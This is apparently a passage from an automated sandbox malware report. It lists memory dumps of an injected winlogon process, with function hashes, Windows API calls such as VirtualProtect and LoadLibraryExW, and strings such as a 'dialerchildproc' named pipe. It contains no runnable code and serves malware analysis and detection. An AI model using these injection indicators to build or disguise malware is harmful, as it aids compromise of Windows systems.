                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                  • String ID: d
                                                                  • API String ID: 3743429067-2564639436
                                                                  • Opcode ID: 4fe3aae0cbb599a1eee1f2be40b2bdf186d2f5bad4b5f62f31428b11ea11a368
                                                                  • Instruction ID: 44decc96365dca59f4748440e41b87c1bea2e1dda2114f176bb14cf4e124cbfa
                                                                  • Opcode Fuzzy Hash: 4fe3aae0cbb599a1eee1f2be40b2bdf186d2f5bad4b5f62f31428b11ea11a368
                                                                  • Instruction Fuzzy Hash: AC416F77214F90D6E760CFA5E45839AB7A1F388B99F448129DB890BB98DF38C549CB00
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                  • String ID: d
                                                                  • API String ID: 3743429067-2564639436
                                                                  • Opcode ID: 4fe3aae0cbb599a1eee1f2be40b2bdf186d2f5bad4b5f62f31428b11ea11a368
                                                                  • Instruction ID: eb49eb748c89d3ea360b01ac63e6da2e3fd63eeae5794c5364ff5fd5cc2816dc
                                                                  • Opcode Fuzzy Hash: 4fe3aae0cbb599a1eee1f2be40b2bdf186d2f5bad4b5f62f31428b11ea11a368
                                                                  • Instruction Fuzzy Hash: EB418377218F90D6E760CFA5E44879E77A1F388B99F148115DB8A07B58DF38C449CB00
                                                                  APIs
                                                                  • FlsGetValue.KERNEL32(?,?,?,00000225DC67CC0E,?,?,?,?,?,?,?,?,00000225DC67D3CD,?,?,00000001), ref: 00000225DC67D4B7
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000225DC67CC0E,?,?,?,?,?,?,?,?,00000225DC67D3CD,?,?,00000001), ref: 00000225DC67D4D6
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000225DC67CC0E,?,?,?,?,?,?,?,?,00000225DC67D3CD,?,?,00000001), ref: 00000225DC67D4FE
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000225DC67CC0E,?,?,?,?,?,?,?,?,00000225DC67D3CD,?,?,00000001), ref: 00000225DC67D50F
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000225DC67CC0E,?,?,?,?,?,?,?,?,00000225DC67D3CD,?,?,00000001), ref: 00000225DC67D520
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Value
                                                                  • String ID: 1%$Y%
                                                                  • API String ID: 3702945584-1395475152
                                                                  • Opcode ID: 414de4670033e7547a0a5b3bdda6d862915786416a62f5675f2ee32494ca94ec
                                                                  • Instruction ID: 7a5cade007396d89c313b2eded1a0e0c2a17c4b5336f1a6556e0ae1fe585a1f5
                                                                  • Opcode Fuzzy Hash: 414de4670033e7547a0a5b3bdda6d862915786416a62f5675f2ee32494ca94ec
                                                                  • Instruction Fuzzy Hash: 1911E728305E64B2FE5897FDA94D33922415F847F6F54CF24A8390AFDADE38C456C601
                                                                  APIs
                                                                  • FlsGetValue.KERNEL32(?,?,?,00000225DC64CC0E,?,?,?,?,?,?,?,?,00000225DC64D3CD,?,?,00000001), ref: 00000225DC64D4B7
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000225DC64CC0E,?,?,?,?,?,?,?,?,00000225DC64D3CD,?,?,00000001), ref: 00000225DC64D4D6
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000225DC64CC0E,?,?,?,?,?,?,?,?,00000225DC64D3CD,?,?,00000001), ref: 00000225DC64D4FE
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000225DC64CC0E,?,?,?,?,?,?,?,?,00000225DC64D3CD,?,?,00000001), ref: 00000225DC64D50F
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000225DC64CC0E,?,?,?,?,?,?,?,?,00000225DC64D3CD,?,?,00000001), ref: 00000225DC64D520
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Value
                                                                  • String ID: 1%$Y%
                                                                  • API String ID: 3702945584-1395475152
                                                                  • Opcode ID: 414de4670033e7547a0a5b3bdda6d862915786416a62f5675f2ee32494ca94ec
                                                                  • Instruction ID: 7258fba70c469de14b0abad65e245d1751330628400bd6022e2dbc4a76e57fcf
                                                                  • Opcode Fuzzy Hash: 414de4670033e7547a0a5b3bdda6d862915786416a62f5675f2ee32494ca94ec
                                                                  • Instruction Fuzzy Hash: 7311B228B0DE6461FE58A7FEE54D36932415F847F6F44C3A4A83B46BDADE38C482C601
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                                  • String ID: \\.\pipe\dialerchildproc
                                                                  • API String ID: 166002920-1933775637
                                                                  • Opcode ID: 46ac6f3595cd08ba72cfe16ac14249d71bcf4bf6cdab2aa291378c72e2095538
                                                                  • Instruction ID: 5143fbefe5be0cbdbfcec55bfe3b06ee70d7d12685544569a92137414076662f
                                                                  • Opcode Fuzzy Hash: 46ac6f3595cd08ba72cfe16ac14249d71bcf4bf6cdab2aa291378c72e2095538
                                                                  • Instruction Fuzzy Hash: CF117C7A614B50D2E710CFA9F50875A6760F789BA6F908311EB5A06BE8CF7CC148CB05
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
• Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
• Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
Similarity
• API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
• String ID: \\.\pipe\dialerchildproc
• API String ID: 166002920-1933775637
• Opcode ID: 46ac6f3595cd08ba72cfe16ac14249d71bcf4bf6cdab2aa291378c72e2095538
• Instruction ID: 9d95a24ee7134dd075f6916613b88123dbf79a1f71578d387e86653e009e63ca
• Opcode Fuzzy Hash: 46ac6f3595cd08ba72cfe16ac14249d71bcf4bf6cdab2aa291378c72e2095538
• Instruction Fuzzy Hash: 65114F75628B5092E7108FA5F50875A7771F389BA6F608315EB5A02BA8CF7CC144CB00
APIs
Memory Dump Source
• Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
• Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID:
• API String ID: 190073905-0
• Opcode ID: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
• Instruction ID: 63ad33cb13a1a1ecb4fb3b89351e14cbc887f17384d78b1a824e8bcf136f24cd
• Opcode Fuzzy Hash: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
• Instruction Fuzzy Hash: 3A81F52C700F61AAFB52AFED944D3596290AB89B82F14CD259B0487FD6DFB8C945CF00
APIs
Memory Dump Source
• Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
• Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID:
• API String ID: 190073905-0
• Opcode ID: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
• Instruction ID: 245c3a3780669e612167fd2f49c2b2f1444ffda43349089e810e4d17d475938c
• Opcode Fuzzy Hash: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
• Instruction Fuzzy Hash: 1181262C71CF71BAFB90AFED984D3593290AB85B82F14D1A5DA0783796DB38C945CB00
APIs
• LoadLibraryExW.KERNEL32(?,?,?,00000225DC67A3B3,?,?,?,00000225DC679B9C,?,?,?,?,00000225DC6796BD), ref: 00000225DC67A279
• GetLastError.KERNEL32(?,?,?,00000225DC67A3B3,?,?,?,00000225DC679B9C,?,?,?,?,00000225DC6796BD), ref: 00000225DC67A287
• LoadLibraryExW.KERNEL32(?,?,?,00000225DC67A3B3,?,?,?,00000225DC679B9C,?,?,?,?,00000225DC6796BD), ref: 00000225DC67A2B1
• FreeLibrary.KERNEL32(?,?,?,00000225DC67A3B3,?,?,?,00000225DC679B9C,?,?,?,?,00000225DC6796BD), ref: 00000225DC67A2F7
• GetProcAddress.KERNEL32(?,?,?,00000225DC67A3B3,?,?,?,00000225DC679B9C,?,?,?,?,00000225DC6796BD), ref: 00000225DC67A303
Strings
Memory Dump Source
• Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
• Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
Similarity
• API ID: Library$Load$AddressErrorFreeLastProc
• String ID: api-ms-
• API String ID: 2559590344-2084034818
• Opcode ID: c60201aec778344204bcef1649fbeec24da53dc38ebde7e62b727d681ed7f771
• Instruction ID: 93bdd749a80a6279d82df938997b6772221fc21d9ad4c52bcd094a8c62c4e4d0
• Opcode Fuzzy Hash: c60201aec778344204bcef1649fbeec24da53dc38ebde7e62b727d681ed7f771
• Instruction Fuzzy Hash: CD31C935316E60F1EE11DFC9A4087552394FB04B61F699925AD2E47BD2DF39C545C310
APIs
• LoadLibraryExW.KERNEL32(?,?,?,00000225DC64A3B3,?,?,?,00000225DC649B9C,?,?,?,?,00000225DC6496BD), ref: 00000225DC64A279
• GetLastError.KERNEL32(?,?,?,00000225DC64A3B3,?,?,?,00000225DC649B9C,?,?,?,?,00000225DC6496BD), ref: 00000225DC64A287
• LoadLibraryExW.KERNEL32(?,?,?,00000225DC64A3B3,?,?,?,00000225DC649B9C,?,?,?,?,00000225DC6496BD), ref: 00000225DC64A2B1
• FreeLibrary.KERNEL32(?,?,?,00000225DC64A3B3,?,?,?,00000225DC649B9C,?,?,?,?,00000225DC6496BD), ref: 00000225DC64A2F7
• GetProcAddress.KERNEL32(?,?,?,00000225DC64A3B3,?,?,?,00000225DC649B9C,?,?,?,?,00000225DC6496BD), ref: 00000225DC64A303
Strings
Memory Dump Source
• Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
• Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
Similarity
• API ID: Library$Load$AddressErrorFreeLastProc
• String ID: api-ms-
• API String ID: 2559590344-2084034818
• Opcode ID: c60201aec778344204bcef1649fbeec24da53dc38ebde7e62b727d681ed7f771
• Instruction ID: 7c354baf2becc406c9690de1d574f0e0c23927cd8675cd5bc7f9ca9363dd24dd
• Opcode Fuzzy Hash: c60201aec778344204bcef1649fbeec24da53dc38ebde7e62b727d681ed7f771
• Instruction Fuzzy Hash: 9831C72931EE60B1EE129BCAA4087553394F708B66F698664EE1F47392EF39C144C300
APIs
Strings
Memory Dump Source
• Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
• Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
• String ID: CONOUT$
• API String ID: 3230265001-3130406586
• Opcode ID: 825ce686359a22e25232def11d6f08b48dee252c530cecc749e4dc9d381a3549
• Instruction ID: dcc30e952b56894f8f882cea4a7a8afdedaba1e3027df95fb4c3850d902d2072
• Opcode Fuzzy Hash: 825ce686359a22e25232def11d6f08b48dee252c530cecc749e4dc9d381a3549
• Instruction Fuzzy Hash: CF119035314F6096E750CBDAF85831966A0FB88BE6F548215EA5E8B7D4CF38C404C745
APIs
Strings
Memory Dump Source
• Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
• Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
• String ID: CONOUT$
• API String ID: 3230265001-3130406586
• Opcode ID: 825ce686359a22e25232def11d6f08b48dee252c530cecc749e4dc9d381a3549
• Instruction ID: 69caf4a79e949a29d135b95860dd2f68db3fa5e2b64677b329da0df6282d1a4f
• Opcode Fuzzy Hash: 825ce686359a22e25232def11d6f08b48dee252c530cecc749e4dc9d381a3549
• Instruction Fuzzy Hash: 6B118F35324F6096E7908BDAF85832966A4F788FE6F248225EA5E87794DF38C804C740
APIs
Strings
Memory Dump Source
• Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
• Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
Similarity
• API ID: CurrentProcessProtectVirtual$HandleModule
• String ID: wr
• API String ID: 1092925422-2678910430
• Opcode ID: 1983e7b2aaee179c95f49a9ecb428acdca8d3318c5669cc08ca5f07c1a06eaeb
• Instruction ID: b10adc177de773fbabd993369e697b4a55bd2c125b3a7f779076e93c5e5e0882
• Opcode Fuzzy Hash: 1983e7b2aaee179c95f49a9ecb428acdca8d3318c5669cc08ca5f07c1a06eaeb
• Instruction Fuzzy Hash: D9118E6A300B5092EB649BA9E4482696261FB48F95F548838DF8D07B94EF3DC544C708
APIs
Memory Dump Source
• Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
• Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
Similarity
• API ID: Thread$Current$Context
• String ID:
• API String ID: 1666949209-0
• Opcode ID: 6eebb9b89febcdc057b9e2366de4ef2aabdd815d2606de48d9a359409e558620
• Instruction ID: 6a97c4c12a32b94d673c00423403d4c75ff52a93935e058119094c360a29ac69
• Opcode Fuzzy Hash: 6eebb9b89febcdc057b9e2366de4ef2aabdd815d2606de48d9a359409e558620
• Instruction Fuzzy Hash: 6CD1AA7A208F98D5DA70DB9AE49835AB7A0F388B85F104616EACD47BA5DF7CC541CB00
APIs
Strings
Memory Dump Source
• Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
• Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
Similarity
• API ID: Heap$Process$AllocFree
• String ID: dialer
• API String ID: 756756679-3528709123
• Opcode ID: b0319cbd86f06d073dcced0acdf6bc1c6042bb64f80e9fc0b828a3d11e191795
• Instruction ID: 7ade69da3f205b80d6d51427c7ba1e6dfbeddfa96b255973500cefac0ca4292f
• Opcode Fuzzy Hash: b0319cbd86f06d073dcced0acdf6bc1c6042bb64f80e9fc0b828a3d11e191795
• Instruction Fuzzy Hash: 39319F3A705F61A2EB50DFEAE54876963A0BB54F82F18C9348F5807B95EF34D465C300
APIs
Strings
Memory Dump Source
• Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
• Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
Similarity
• API ID: Heap$Process$AllocFree
• String ID: dialer
• API String ID: 756756679-3528709123
• Opcode ID: b0319cbd86f06d073dcced0acdf6bc1c6042bb64f80e9fc0b828a3d11e191795
• Instruction ID: 6f800f5eb6f628bcdb478ea8421835497432b21b4983bca8d0c9fc270d56c7b5
• Opcode Fuzzy Hash: b0319cbd86f06d073dcced0acdf6bc1c6042bb64f80e9fc0b828a3d11e191795
• Instruction Fuzzy Hash: D731702970DF65A2EA54DFEAE94876A7390BB54F81F08C1348F4907B55EF34D465C700
APIs
• GetLastError.KERNEL32(?,?,?,00000225DC67DAE5,?,?,?,?,00000225DC67DBA8), ref: 00000225DC67D3DF
• FlsSetValue.KERNEL32(?,?,?,00000225DC67DAE5,?,?,?,?,00000225DC67DBA8), ref: 00000225DC67D415
• FlsSetValue.KERNEL32(?,?,?,00000225DC67DAE5,?,?,?,?,00000225DC67DBA8), ref: 00000225DC67D442
• FlsSetValue.KERNEL32(?,?,?,00000225DC67DAE5,?,?,?,?,00000225DC67DBA8), ref: 00000225DC67D453
• FlsSetValue.KERNEL32(?,?,?,00000225DC67DAE5,?,?,?,?,00000225DC67DBA8), ref: 00000225DC67D464
• SetLastError.KERNEL32(?,?,?,00000225DC67DAE5,?,?,?,?,00000225DC67DBA8), ref: 00000225DC67D47F
Memory Dump Source
• Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
• Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
Similarity
• API ID: Value$ErrorLast
• String ID:
• API String ID: 2506987500-0
• Opcode ID: 7fc5e4c2f951738899047b95e00f4424a4026db9f78df7ad039e65ab4a94a20b
• Instruction ID: 81a05c6f5631c5457e9fe2b42ee4983d0892a68f7a2414799b655d9ba0bc122a
• Opcode Fuzzy Hash: 7fc5e4c2f951738899047b95e00f4424a4026db9f78df7ad039e65ab4a94a20b
• Instruction Fuzzy Hash: 91116028305EA4A2FA54A7FDA94D32922526F487F2F14CF24A8360BEDADE38D455C201
                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,?,?,00000225DC64DAE5,?,?,?,?,00000225DC64DBA8), ref: 00000225DC64D3DF
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000225DC64DAE5,?,?,?,?,00000225DC64DBA8), ref: 00000225DC64D415
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000225DC64DAE5,?,?,?,?,00000225DC64DBA8), ref: 00000225DC64D442
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000225DC64DAE5,?,?,?,?,00000225DC64DBA8), ref: 00000225DC64D453
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000225DC64DAE5,?,?,?,?,00000225DC64DBA8), ref: 00000225DC64D464
                                                                  • SetLastError.KERNEL32(?,?,?,00000225DC64DAE5,?,?,?,?,00000225DC64DBA8), ref: 00000225DC64D47F
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
Similarity
• API ID: Value$ErrorLast
• String ID:
• API String ID: 2506987500-0
APIs
Memory Dump Source
• Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
• Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
Similarity
• API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
• String ID:
• API String ID: 517849248-0
APIs
Memory Dump Source
• Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
• Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
